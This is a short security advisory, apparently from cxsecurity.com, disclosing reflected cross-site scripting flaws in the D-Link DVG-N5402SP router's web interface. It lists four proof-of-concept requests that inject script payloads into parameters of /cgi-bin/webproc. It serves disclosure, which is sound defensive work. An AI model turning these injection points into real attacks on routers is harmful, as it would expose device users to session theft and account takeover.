DLINK DVG­N5402SP Multiple Cross-Site Scripting

2016.02.23
Credit: vesp3r
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

DLink Multiple Cross Site Scripting Vulnerabilities Vendor : www.dlink.com Product Model: DVG胤5402SP Published: 02/22/2016 Discovered by vesp3r (vesp3r7c3@gmail.com) Advisory Timeline ----------------- 02/05/2016 - Vendor notified (No response) Vulnerability ------------- Reflected Cross Site Scripting 1) getpage parameter GET /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced1337"%3balert(1)%2f%2f158&var:page=firewall&var:subpage=URLFilter HTTP/1.1 2) var:menu parameter GET /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup1337"%3balert(1)%2f%2f122&var:page=connected&var:retag=1&var:subpage=- HTTP/1.1 3) var:page parameter /cgi-bin/webproc?getpage=html/index.html&var:menu=advanced&var:page=firewall9542"%3balert(1)%2f%2f198&var:subpage=dmz 4) var:subpage parameter /cgi-bin/webproc?getpage=html/index.html&errorpage=html/main.html&var:language=zh_cn&var:menu=setup&var:page=connected&var:retag=1&var:subpage="><script>alert(1)<%2fscript>z376l HTTP/1.1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top